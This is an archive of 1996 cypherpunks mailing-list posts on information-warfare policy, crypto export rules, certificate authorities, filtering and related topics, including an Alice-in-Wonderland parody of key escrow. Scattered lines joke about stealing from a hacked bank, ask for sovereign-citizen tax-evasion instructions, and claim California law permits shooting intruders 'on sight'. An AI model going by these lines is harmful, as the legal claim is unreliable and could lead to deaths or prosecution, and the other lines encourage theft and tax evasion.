>> shipbuilders to add certain "national defense features" to ships they were
>> building, to harden them in excess of normal civilian requirements so
>> they'd be robust in time of war. No shipbuilder could afford such features
>> unaided, and without them we either had a dramatically reduced shipping
>> capability in wartime or a very vulnerable one. Things have changed since
>> then, but the basic principles in the example are still valid.
>
>This wonderful little anecdote proves nothing by itself.  How many of
>these merchant ships survived u-boat torpedos thanks to this hardening?
>I'd guess the number's pretty near zero.

You should do your homework. It has to do with being able to carry military
cargoes. Those features worked perfectly.

>
>
>> > In fact, I argue that the situation is at least
>> >partially of government construction.  The government's hindrance of
>> >crypto technology has undoubtedly slowed down and in many cases
>> >entirely prevented the application of current technology to protect
>> >the very systems the government now purports to be concerned about.
>>
>> There are no restrictions on using as good domestic crypto as you can get,
>> and this issue is about the robustness of our domestic information
>> infrastructure.
>
>This is simply wrong.  There *are* restrictions on domestic crypto.  They
>are restrictions imposed by the crypto export policy.   Maybe there isn't
>an outright ban but there *are* nevertheless real restrictions (look up
>"restrict" in a dictionary near you).  And tell Netscape there are no
>restrictions.  We've all seen what they're going through to provide
>download access to domestic customers for products with strong encryption.
>News flash for David: jumping through these types of government-imposed
>hoops costs *real money* that could be better spent elsewhere.

You should do your homework. There are many restrictions in this world;
business licenses, paying for services used, etc. My point was that there
are no laws prohibiting strong domestic crypto and you know that to be
true.

>
>
>>                 Clearly if hardening were cost-justified to the civilian
>> companies it would have been done already.
>
>It is being done as we speak.  The government has clearly slowed the
>process down though.  And the more governmental involvement, the slower
>the process will go.  (And the quality of the result will likely suffer
>too.)

You are evading my point, which is that some protections are too expensive
for an individual firm to cost-justify but are justified in public benefits
from such protections. And there's no evidence that government regulations
have slowed down protections on domestic financial networks, domestic air
traffic control networks, etc.

I would not object if you were making valid points, but you're not. You're
evading the basic argument and trying to respond by nit-picking.

>
>
>> One of the core problems is that the benefits from hardening cannot be
>> captured by the individual compnanies, so they cannot cost-justify doing
>> it.
>
>This hasn't been demonstrated to my satisfaction.  I disagree, and I bet
>most American companies would too.

Again, you haven't done your homework. Ask any serious company what they'd
like to be able to do, and what they can afford (cost-justify) doing. I can
tell you from direct personal experience (I've been a senior technical
executive of two Fortune 50 companies) that you are flat wrong. Don't take
my word for it--ask the security chief of any Fortune 50 company.

Some companies used to have an aphorism "If you haven't had at least one
security violation, you're spending too much money on security." I don't
agree, but it reflects what companies used to think they could afford
unaided. Yet these days a "security violation" isn't just some safe left
unlocked in a guarded area but the West Coast power grid going down or a
747 being spoofed into a mountain.

>
>
>> it. But the losses from failure to harden can cost the wider society much
>> treasure. That's a natural case for government intervention on behalf of
>> the wider society. It's exactly like the "lighthouse" argument. The
>> benefits from a lighthouse can't justify an individual shipbuilder building
>> one, but the losses to society from the random aggregation of shipwrecks
>> are far greater than the cost of lighthouses. Ergo, the government builds
>> the lighthouses.
>
>Apples and oranges.  The costs of protecting companies' resources is not
>so high and the potential costs of not doing so are far higher.

"not so high" compared to what? what level of protection?
"costs of not doing so" doesn't capture public losses, which is the basis
for government intervention.You haven't done your homework. I suggest you
read any introductory economics text that covers public policy economics,
or any good cost/benefit analysis text.

>
>
>> >My message to a government concerned about the dangers of "information
>> >warfare" (and its apologists): get out of the way and let industry work
>> >on security.  Then you can choose from the products offered for your
>> >protection or develop your own.  But don't sit there and prevent or help
>> >prevent deployment of security technology while decrying the lack of
>> >security.
>>
>> This isn't about preventing domestic deployment but assisting it. You are
>> raising an entirely unrelated issue--crypto export policy.
>
>I'm merely pointing out the hypocrisy of a government that bemoans the
>lack of security infrastructure even as it has been hard at work raising
>obstacles to those that would build it.

Now THAT is apples and oranges. The security of, say, IBM's, or the FAA's,
or AT&T's domestic computer networks has little to do with crypto export
policy.

>
>
>> >I don't claim that the current security deficiencies are entirely due
>> >to ITAR restrictions but it is certainly a significant factor, and there
>> >is still zero evidence that the government is competent to help.  Let
>> >them first fix their own problems (e.g. the alleged 250,000 DoD computer
>> >breakins), *then* come help us in the private sector.
>>
>> Again as irrelevant as the argument that we shouldn't jail criminals until
>> we've eliminated the economic inequities that allegedly produce crime.
>
>Putting the government in charge of fixing security problems is likely
>to result in an infrastructure optimized for surveillance, as we've seen
>with other government-sponsored initiatives (Clipper, DigitalTelephony,
>etc.).

The subject matter of the Commission's inquiry has more to do with
authentication than message encryption, and more to do with infrastructure
and network security. And as it happens there is no problem getting export
licenses for authentication-only software with as secure a key as you like
and no escrow. RIPEM/SIG did it years ago. You aren't even on the same page
as this issue.


>The only security assistance that business and the public have ever
>gotten from the government has been the kind with unacceptable conditions
>(like undisclosed algorithms, "escrowed" keys, secret courts, etc.).

Again, you are trying to fight a different battle in the wrong arena.
This isn't about your ability to encrypt your traffic. It's about securing
the domestic infrastructure against information warfare. I know this is
beginning to sound tiresome, but you'd better do your homework.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harka@nycmetro.com
Date: Fri, 19 Jul 1996 07:29:02 +0800
To: cypherpunks@toad.com
Subject: Secure IRC conversations
Message-ID: <TCPSMTP.16.7.18.15.31.48.2780269260.1197732@nycmetro.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi there,

does anybody know of a way to have encrypted conversations on the IRC or via ytalk?

Thanks,

Harka
___ Blue Wave/386 v2.30 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: virgo@nob.tiac.net
Date: Fri, 19 Jul 1996 08:10:43 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <ae1308450f021004a134@[205.199.118.202]>
Message-ID: <Pine.LNX.3.93.960718154401.11282C-100000@nob.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


This is nothing new.
How many people remember Operation Sundevil?

This has been going on for over 10 years now -- it's only now that
people actually *care*.

IMHO,
Millie





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: virgo@nob.tiac.net
Date: Fri, 19 Jul 1996 08:58:23 +0800
To: Jüri Kaljundi <jk@stallion.ee>
Subject: Re: Cybank breaks new ground; rejects public-key encryption
In-Reply-To: <Pine.GSO.3.93.960718180020.10966B-100000@nebula.online.ee>
Message-ID: <Pine.LNX.3.93.960718160324.11282F-100000@nob.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 18 Jul 1996, [ISO-8859-1] Jüri Kaljundi wrote:

> enough for my work. What might be a good reward for hacking into an
> Internet bank and showing I can steal their money?

How about the money? ;)

Millie.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: enquirer@alpha.c2.org
Date: Fri, 19 Jul 1996 10:32:43 +0800
To: cypherpunks@toad.com
Subject: Alternative Journalism
Message-ID: <199607182304.QAA18936@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



                   THE CYPHERPUNK ENQUIRER PRESENTS:

                 "Adventures in Alternative Journalism"

                          The Analysis Piece


Alice stared at the two strange creatures.  She was completely dumbfounded.

"So let me see if I've got this right.  You make really good wheels.  But
if the Queen of Hearts had wheels, her subjects who occasionally raid your
borders would be able to get away faster, and you wouldn't catch as many of
them.  Is that right, Tweedledumb?"

"I'm Tweedledumber.  He's Tweedledumb.  Yes, that's right.  We have a 
technological lead over the Cards, and we have to maintain it."

"So you won't sell them wheels?"

"Well, it's more complex than that.  A large part of our population is engaged
in making wheels, and we make a lot of money selling them to the Cards.  So
we made a compromise.  We only sell them SQUARE wheels."

"But of course," Tweedledumb chimed in, "it's very expensive to make both
square and round wheels.  So most of our people only make square wheels,
so they can sell them to both us and the Cards.  Of course, our people
are allowed to buy round wheels, IF they can find them."

"AND," stated Tweedledumber, "since the wheel is patented here, we get to
collect a hefty licensing fee for every wheel sold."

"But the Cards DO have wheels!"  Alice could see over the fence, and the
Cards were happily zipping around all over the place.  "And so do a lot of
people over here.  What happened?"

"Well, we couldn't stop the Cards from building their OWN wheels ... "

"And people like buying the Card wheels because they're faster than our
wheels, and they're cheaper, because they don't have to pay us the 
licensing fee ..."

"You see, we have a licensing treaty with the Cards for most things, so if
they make something we have a patent on, they have to pay us, but the 
wheel can't be exported, so it can't EXIST over there, so our patents don't
apply ... "

"But I don't understand!  You said you needed to catch people, but now you
can hardly catch anyone!"  Alice was totally astounded at what she was
hearing.

"It's only a stopgap measure anyway."  Tweedledumber clasp his hands behind
his back and started pacing.  "We need to get an agreement with the Queen of
Hearts that both of our people will only use, oh, say, pentagonal and
maybe hexagonical wheels.  That way, everyone can get around faster, but
we'll still be able to catch them."

"But who's WE?"

"Anybody with a TLA on their shirt.  WE get round wheels."

"What's a TLA?"

Alice almost felt relieved when she saw the familiar grin materialize.  The
rest of the Cheshire Cat soon followed.

"A TLA, my dear, is a Three Letter Anachronism.  When people start referring
to you by your initials, you've overstayed your welcome.  If everyone starts
calling ME TCC, I'll know it's time to find another job."

The caterpillar spoke up from its perch on the toadstool.  "Wrong, tuna
breath.  TLA's are the only thing standing between society and total
chaos."

Alice turned to face the caterpillar, who responded by blowing a lungful
of hookah smoke in her face.

"THESE two goons only deal with the dangers of the Queen of Hearts and her
soldiers, I have to worry about the domestic situation.  So we came up with
a solution.  There are certain unscrupulous locals who engage in terrible
things, terrorism, drug dealing, child molestation, money laundering ...
we have to be able to catch them.  If they had wheels, they could outrun
us.  But if we had ACCESS to those wheels when we needed it ... by the way,
speaking of drug dealers, we know about that mushroom, and the pills.  You
might want to think really hard about playing ball with us, the Queen of
Hearts is rather fond of cutting off dope addict's heads."

"Access to wheels?  Does that have anything to do with those ropes hanging
off the back of those carts?"

"Yup.  We pull on that rope, the wheels fall off.  And since we may have to
stop a LOT of people at one time, we could have a riot, or another Butthole
Surfers concert, we figure that we should be able to stop about
ten percent of the population at once, a little less in the rural areas ...
well, they've gotta be REALLY LONG ROPES ... and there have to be A WHOLE LOT
of them ... course, the ones with the ropes we let have octagonal wheels ... "

"But can't just anybody pull the rope?  You'll have wheels falling off all
over the place."

"Price you have to pay for a safe society.  Besides, we have trusted third
parties holding to to the other end."

"How will you get people to use it, when they can get regular wheels from the
Cards?"

"How else?  We could pass a law.  But it's easier just to threaten all the
wheel dealers - put the rope on or we shut you down.  Spread the word that
only criminals don't use ropes - what are you afraid of?  Got something to
hide?  Eventually we'll have to outlaw the round wheel, of course, but for
the time being, some creative social engineering should do the trick."  The
caterpillar took another long drag on the hookah.  "Good shit.  Dole was
right about this stuff."

"But can't people get real wheels for free?"

"Sure, we've pulled off enough they're lying around all over the place.  But
then you need an axle, bearings, steering - most people still just go down 
and buy the whole package.  We get them, we're in - guy up in Seattle makes
something like 90% of all carts sold here, you should see the shit we've got
on HIM!  No problemo.  And those idiots at Netscape - we've got them doing
a complete background check on anybody who wants a round wheel - come back
in five days, and maybe you can have it."

"So, Alice, are you learning anything?"

Alice liked the Cheshire Cat, but it did have very sharp teeth, and very long
claws, and it did have the habit of appearing out of nothing.  Alice felt
that it should be treated with respect.  "Not really, your cattiness.  It 
doesn't make any sense at all!"

"It isn't supposed to.  You have to look at it the right way.  From their
perspective, it makes perfect sense."

"I'm confused."

"Don't worry about it.  It gets worse before it gets better.  Come on, we're
going to a party.  Tim May and John Gilmore are throwing a Mad Tea Party."

"Are they really mad?"

"May's crazy as a loon.  You'll like him.  Gilmore, he's just still pissed
at Shimamura for that stunt in the hot tub ... "




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@ACM.ORG>
Date: Fri, 19 Jul 1996 12:19:20 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: Reasonable validation of a software package
In-Reply-To: <31E87985.6EF9@ozemail.com.au>
Message-ID: <v03007601ae1448b80235@[168.143.8.144]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:33 -0400 7/13/96, Michael Froomkin wrote:
>This illustrates the need for and role of certification authorities.
>
>See http://www.law.miami.edu/~froomkin/articles/trusted.htm  for some
>info.
>

["this" being the possibility that someone would generate lots of signed
public keys with your name on them]

However, there's nothing to stop generation of many certificates from
trusted CAs with your name on them.  In fact, if you have a name like
Michael Smith, and if a CA is successful, there *will be* lots of
certificates with your name on them, even without anyone's trying to do
anything crooked.

The problem people overlook is that a CA binds a public key to a name but
the name is in the CA's name space.  For me, a verifier, to derive any
value from a certificate binding (key,name), the name has to be in *my*
name space.

If there were such a thing as a global namespace meaningful to everyone,
then we could both use it.  That's the X.500 falacy/pipe-dream.

The fact is, no global name space could be held in one human's mind, so
there's no way a global name space could be meaningful to me.

So, to use a certificate from a CA, I need to map a name from its name
space (DN) into a name in my name space (nickname).  Every time I've looked
at that process, I've had to have a secure channel over which to learn from
the person I call by that nickname what DN he goes by.  If I have that
secure channel, then he could tell me his public key fingerprint ove that
cnnel -- and I wouldn't need the CA.

 - Carl


+------------------------------------------------------------------------+
|Carl M. Ellison   cme@acm.org     http://www.clark.net/pub/cme          |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2|
|  "Officer, officer, arrest that man!  He's whistling a dirty song."    |
+-------------------------------------------- Jean Ellison (aka Mother) -+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Fri, 19 Jul 1996 10:14:51 +0800
To: cypherpunks@toad.com
Subject: Re: New Infowarfare Panel
In-Reply-To: <v03007600ae14596455b3@[192.187.162.15]>
Message-ID: <199607182314.QAA15523@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



>At 12:09 PM -0700 7/18/96, Mike McNally wrote:
>>My personal recollection is that many of the InfoWar techniques we crafted
>>during the Gulf War involved using high speed fighter-bomber aircraft to
>>drop guided munitions on top of selected pieces of the communications
>>infrastructure.

David Sternlight <david@sternlight.com> writes:
>I'm talking about some of the information that started slowly leaking out
>later, not the prime-time TV pyrotechnics.

Please elaborate.  Worked examples of info warfare would be useful for
us to study... making useful government policy based on unsupported
recollections and dubious anecdotes is difficult.  (I won't drag in the
more cypherpunk-related example I had in mind, for fear of derailing
this conversation from this specific topic.)

	Jim Gillogly
	Hevensday, 25 Afterlithe S.R. 1996, 23:13




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Fri, 19 Jul 1996 11:29:05 +0800
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Surf-filter lists
Message-ID: <2.2.32.19960718232909.006ab4e4@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:31 PM 7/17/96 -0500, you wrote:

><rant>A Private organization cannot "censor" anything.  The fundamental 
>definition of the word require some agent of the government take action 
>to censor.  To accuse Surf-Watch, net-nanny, AOL, MSU, AT&T, or whatever 
>of "censorship" accomplishes nothing except to make us look the 
>fool.</rant> 

I am not going to go into petty details about the actual definition of
censor, and how private organizations do censor, but private citizens
have the option of getting their information from an uncensored source,
the same as when a government censors. The only difference is the 
government is allowed to use physical coercion, whereas on the surface
corporations are not yet allowed to do so.

I will, however, address your argument on a different level.  Your view
of this issue typifies one of the primary objections I have to many of 
the arguments amongst libertarians.  The problem is NOT JUST GOVERNMENT.
It is with any authority that has power over you. When a private entity 
becomes powerful enough that they have the ability to forcefully exert
their influence over you, they are just as bad as Government.  Granted,
Surf-Watch and so forth haven't yet become that big, but there are some
rather large Media companies who have, as well as institutions such as
the Church.  For example, I think our mainstream news IS censored, and 
not necessarily by the government, more by corporations intent on keeping 
us in the mindframe that will make them the most money and prolong and 
extend their power.

I am not saying that a private entity doesn't or shouldn't have the Legal
Right to censor, but I am saying that censorship of any form by any
entity is a Bad Thing and the public (not the government, mind) should
fight it on all fronts.  This, in my mind, is the only reason to be
dismayed by the decision on the CDA.  It was found that the government
shouldn't censor on the Internet because there were forms of Corporate
censorship available.  It would have truely been a great day if the
decision had been that the government shouldn't censor on the Internet
because censorship is wrong.

>I agree that the problem with the "bait-and-switch" filtering of net 
>materials by these various filtering packages needs to be addressed.  If I 
>want to protect my kids from seeing alt.naughty.pictures, I shoudl still 
>be able to unfilter political and health speech.  The real problem isn't 
>censorship, it's disclosure by the makers of filtering packages about 
>what exactly their packages are going to filter for me and my family.  

That is another problem, not the Real Problem.  The Real Problem is that
parents are scared to have to explain to children why something they've
seen is wrong or bad.  They are afraid to teach their children their
beliefs and values, so instead would rather just filter everything that 
conflicts with those beliefs, so that they believe it by default. This is
a big problem when those children grow away from their parent's influence
though, and creates bigotry and intolerance. (They don't know why they
believe what they do, but believe it with fearful vengeance).

//cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@issl.atl.hp.com>
Date: Fri, 19 Jul 1996 12:53:42 +0800
To: david@sternlight.com (David Sternlight)
Subject: Re: Gorelick testifies before Senate, unveils new executive order
In-Reply-To: <v03007608ae142fe9978b@[192.187.162.15]>
Message-ID: <199607182032.QAA17421@jafar.issl.atl.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


David Sternlight writes:
> 
> At 8:14 AM -0700 7/18/96, Jeff Barber wrote:
> >David Sternlight writes:
> >
> >> Here's the problem in a nutshell: Everyone who has looked at our systems,
> >> from Cliff Stoll on to blue ribbon scientific commissions, has come to the
> >> conclusion that our society is vulnerable to willful sabotage from abroad,
> >> ranging from information sabotage (hacking electronic financial
> >> transactions) to physical sabotage (hacking power grid control computers to
> >> cause widespread power failures leading to serious damage to people and
> >> things; hacking the phone companies' computers, etc.). Some cases have
> >> already been observed. The field has already got a name and lots of
> >> publications. It's called "information warfare" and the government is
> >> taking it VERY seriously.

> >I for one reject your premise and your conclusions.  There is no
> >indication that government is capable of addressing this "problem"
> >in a useful way.
> 
> Let's see what the study group recommends. There are a lot of things the
> government can do, and plenty of historical precedent.

There *are* a lot of things government can do.  There aren't a lot of
things it can do well.  But you want to wait and see what a *government
study group* decides to recommend?  Gee, who can guess what they'll decide?


>                                                        To take one example,
> in the merchant marine industry the government for years paid a subsidy for
> shipbuilders to add certain "national defense features" to ships they were
> building, to harden them in excess of normal civilian requirements so
> they'd be robust in time of war. No shipbuilder could afford such features
> unaided, and without them we either had a dramatically reduced shipping
> capability in wartime or a very vulnerable one. Things have changed since
> then, but the basic principles in the example are still valid.

This wonderful little anecdote proves nothing by itself.  How many of
these merchant ships survived u-boat torpedos thanks to this hardening?
I'd guess the number's pretty near zero.


> > In fact, I argue that the situation is at least
> >partially of government construction.  The government's hindrance of
> >crypto technology has undoubtedly slowed down and in many cases
> >entirely prevented the application of current technology to protect
> >the very systems the government now purports to be concerned about.
> 
> There are no restrictions on using as good domestic crypto as you can get,
> and this issue is about the robustness of our domestic information
> infrastructure.

This is simply wrong.  There *are* restrictions on domestic crypto.  They
are restrictions imposed by the crypto export policy.   Maybe there isn't
an outright ban but there *are* nevertheless real restrictions (look up
"restrict" in a dictionary near you).  And tell Netscape there are no
restrictions.  We've all seen what they're going through to provide
download access to domestic customers for products with strong encryption.
News flash for David: jumping through these types of government-imposed
hoops costs *real money* that could be better spent elsewhere.


>                 Clearly if hardening were cost-justified to the civilian
> companies it would have been done already.

It is being done as we speak.  The government has clearly slowed the
process down though.  And the more governmental involvement, the slower
the process will go.  (And the quality of the result will likely suffer
too.)


> One of the core problems is that the benefits from hardening cannot be
> captured by the individual compnanies, so they cannot cost-justify doing
> it.

This hasn't been demonstrated to my satisfaction.  I disagree, and I bet
most American companies would too.


> it. But the losses from failure to harden can cost the wider society much
> treasure. That's a natural case for government intervention on behalf of
> the wider society. It's exactly like the "lighthouse" argument. The
> benefits from a lighthouse can't justify an individual shipbuilder building
> one, but the losses to society from the random aggregation of shipwrecks
> are far greater than the cost of lighthouses. Ergo, the government builds
> the lighthouses.

Apples and oranges.  The costs of protecting companies' resources is not
so high and the potential costs of not doing so are far higher.


> >My message to a government concerned about the dangers of "information
> >warfare" (and its apologists): get out of the way and let industry work
> >on security.  Then you can choose from the products offered for your
> >protection or develop your own.  But don't sit there and prevent or help
> >prevent deployment of security technology while decrying the lack of
> >security.
> 
> This isn't about preventing domestic deployment but assisting it. You are
> raising an entirely unrelated issue--crypto export policy.

I'm merely pointing out the hypocrisy of a government that bemoans the
lack of security infrastructure even as it has been hard at work raising
obstacles to those that would build it.


> >I don't claim that the current security deficiencies are entirely due
> >to ITAR restrictions but it is certainly a significant factor, and there
> >is still zero evidence that the government is competent to help.  Let
> >them first fix their own problems (e.g. the alleged 250,000 DoD computer
> >breakins), *then* come help us in the private sector.
> 
> Again as irrelevant as the argument that we shouldn't jail criminals until
> we've eliminated the economic inequities that allegedly produce crime.

Putting the government in charge of fixing security problems is likely
to result in an infrastructure optimized for surveillance, as we've seen
with other government-sponsored initiatives (Clipper, DigitalTelephony,
etc.).  The only security assistance that business and the public have ever
gotten from the government has been the kind with unacceptable conditions
(like undisclosed algorithms, "escrowed" keys, secret courts, etc.).
If the government wants to do that to its employees, fine.  (In fact,
if a private company wants to do that to its employees, that's fine too; 
I won't be working for them, but IMO it's their prerogative.)  But I
don't want the government telling industry what to do with its security. 
Furthermore, I don't want my tax dollars involved in funding (or perhaps
worse, "incentivising") it.  Just get government out of this business.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Fri, 19 Jul 1996 08:20:21 +0800
To: "'Multiple recipients of list WIN95-L'" <cypherpunks@toad.com>
Subject: Internet Through Radio
Message-ID: <01BB752B.81D53DE0@ip65.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know how to Internet through radio using packet modems? By next year, our telephone company will be implementing metered phones, this will be unfair to modem users since they do that to prevent people from talking to the phone for long hours.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Fri, 19 Jul 1996 11:05:08 +0800
To: jya@pipeline.com (John Young)
Subject: Re: 119_816
Message-ID: <2.2.32.19960718235050.006c0f38@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 AM 7/17/96 GMT, you wrote:
>   6-17-96. NYP: 
> 
>   "11 Officers Are Accused of Failure to pay Taxes. Claims of 
>   Sovereignty and 98 Dependents." 
> 
>      At least 11 New York City police officers have been 
>      accused of failing to pay any Federal taxes for several 
>      years by declaring they each had 98 dependents and by 
>      insisting that the Government had no right to tax them. 
>      The officers relied on a package of instructions that 
>      described how to avoid paying taxes by declaring that 
>      they were sovereign citizens who did not have to pay 
>      taxes. 

Anyone know which "package of instructions" they were using,
and where they can be obtained online?
//cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 19 Jul 1996 08:40:50 +0800
To: David Lesher <wb8foz@nrk.com>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <199607181149.HAA10639@nrk.com>
Message-ID: <Pine.SV4.3.91.960718165353.7418A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> They do NOT want you to have a number where they don't get ANI.
> They don't want you knowing where they are.


   So don't call them.  I don't recall there being an requirement to call 
an 800 number for permission to purchase, food, shelter or clothing.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 19 Jul 1996 12:06:31 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: Telecom regulations - Reuters coverage
Message-ID: <v02120d03ae147b18526f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:22 7/17/96, E. ALLEN SMITH wrote:
[...]
>>FCC Chairman Hundt Sees Tax On Telecom Industry
>
>>   FAJARDO, Puerto Rico - A small tax will probably be imposed on
>>   telecommunications companies' revenues to subsidize telephone access
>>   in rural areas and help wire classrooms for the Internet, Federal
>>   Communications Commission Chairman Reed Hundt told the nation's
>>   governors.
>
>[...]
>
>>   But ensuring that residents in sparsely populated areas have access at
>>   affordable rates and meeting the administration's goal of wiring every
>>   classroom in the nation for Internet access will require annual
>>   subsidies of about $10 billion, Hundt said.

Ten billion today will of course mean 100 billion tomorrow.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 19 Jul 1996 12:13:24 +0800
To: cypherpunks@toad.com
Subject: Re: #E-CASH: PRODUCT OR SERVICE?
Message-ID: <v02120d04ae147f5e5391@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:19 7/16/96, Stig wrote:

>Perhaps this has already been voiced on the main list (I get a filtered
>helping or two of cypherpunks), but *I'm* surprised that such a generic name
>as 'Ecash' was granted trademark status anywhere.
>
>It's like giving Microsoft a trademark on the term 'Email'...  It's nuts!
>Was the term ecash not in use before DigiCash showed up on the scene?

No that I am aware of. Furthermore, to the best of my knowledge, DigiCash's
Ecash is the only ecash that I am aware of. The other "ecashs" lack various
properties of cash, as previously explained by Bryce.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@IO.COM>
Date: Fri, 19 Jul 1996 09:43:07 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Opiated file systems
In-Reply-To: <ae13d749190210044435@[205.199.118.202]>
Message-ID: <199607182213.RAA10532@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> (Friends of mine have worked on "remote storage" ideas for exactly such
> applications. Clearly there are many options: storage in other local sites,
> storage in offshore sites, encrypted storage, even storage by a "priest"
> functionary ("Son, I am ready to receive your digitally transmitted
> confession.").)

The problem I ran into firsthand with archive sites is that they tend to
turn into porn or pirated software servers.  One could then have the
software delete after a download.  Anyway, one is always open to a denial
of service attack where someone just throws chunks of /dev/random at you.

(About last April when I wrote an offsite secure storage program, I was
testing it on another site.  Some 2 bit children found out about it and
decided to turn it into a porn server, causing major bandwidth to be taken
up.  I then set it to delete any files grabbed when one specifies the MD5
hash.  This stopped the onrush of outgoing stuff, however I got a
bunch of people dumping large amounts of random junk just to deny others
service out of spite.  To foil this, I set a per megabyte limit.  Then,
they just anon-remailed bunches of little files.  I got tired of the abuse
and pulled the plug on it.  It didn't even reach beta testing.)

If someone has any ideas on how to slow down attacks like this, please
E-mail me.  It would be nice to have an offsite storage place, but without
the necessity of giving a bunch of personal info (as with Mcaffee's
WebStor).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 19 Jul 1996 08:40:43 +0800
To: "Clay Olbon II" <Clay.Olbon@dynetics.com>
Subject: Re: ABC News on internet telephony
Message-ID: <199607182136.RAA25253@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 18 Jul 96 at 9:41, Clay Olbon II wrote:

> There was a pretty long piece on the evening news on using the internet for
> long distance and how much money can be saved.  Even had several demos of
> intercontinental phone calls.  The disappointing aspect was they didn't
> mention PGPfone (although if they had, I'm sure child pornographers and
> terrorists would have been mentioned as well :-)  

PGPfone isn't marketed very well.  Other Internet phone software is 
advertised in magazines, promotions with ISPs, etc.

Rob
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Fri, 19 Jul 1996 12:18:22 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Opiated file systems
Message-ID: <2.2.32.19960719003204.00684018@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



>a (hidden) drive to your computer using a reasonably surreptious link that 
>is difficult to trace.  Say, an IR optical link, a single bare (unjacketed) 
>optical fiber, a LAN with hidden nodes, or a similar system.  Maybe an 

I find the idea of the optical fiber very interesting.  Is there such
a beast currently available?  I really don't know anything about fiber,
and therefore it would be very difficult for me to construct such a
system myself...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 19 Jul 1996 13:54:59 +0800
To: ichudov@algebra.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607181704.MAA16235@manifold.algebra.com>
Message-ID: <Pine.SUN.3.91.960718172621.11135B-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 18 Jul 1996 ichudov@algebra.com wrote:

> ...having a gun will not do you much good...you may kill someone
> peaceful who entered your home with good intentions,...

"Peacefully enters Tim's house in the middle of the night with 
"good intentions"?  Tim's friends know his proclivities and would 
call first or at least knock.  All others will be (and should be) 
hors de combat.

>which will get you in jail. 

Nope, not true.  Say what you will about California, but the one
thing it did right was pass a law that said anyone found in your
house at night is presumptively a threat to which you may respond
with deadly force.  Shoot on sight, in other words.

> If you had a metal door, you would have enough time to wake up
> and assess the situation.

This is good advice though.  Ironically, the only person I know
with such a door is an ex-cop.  Who should know better?


 S a n d y

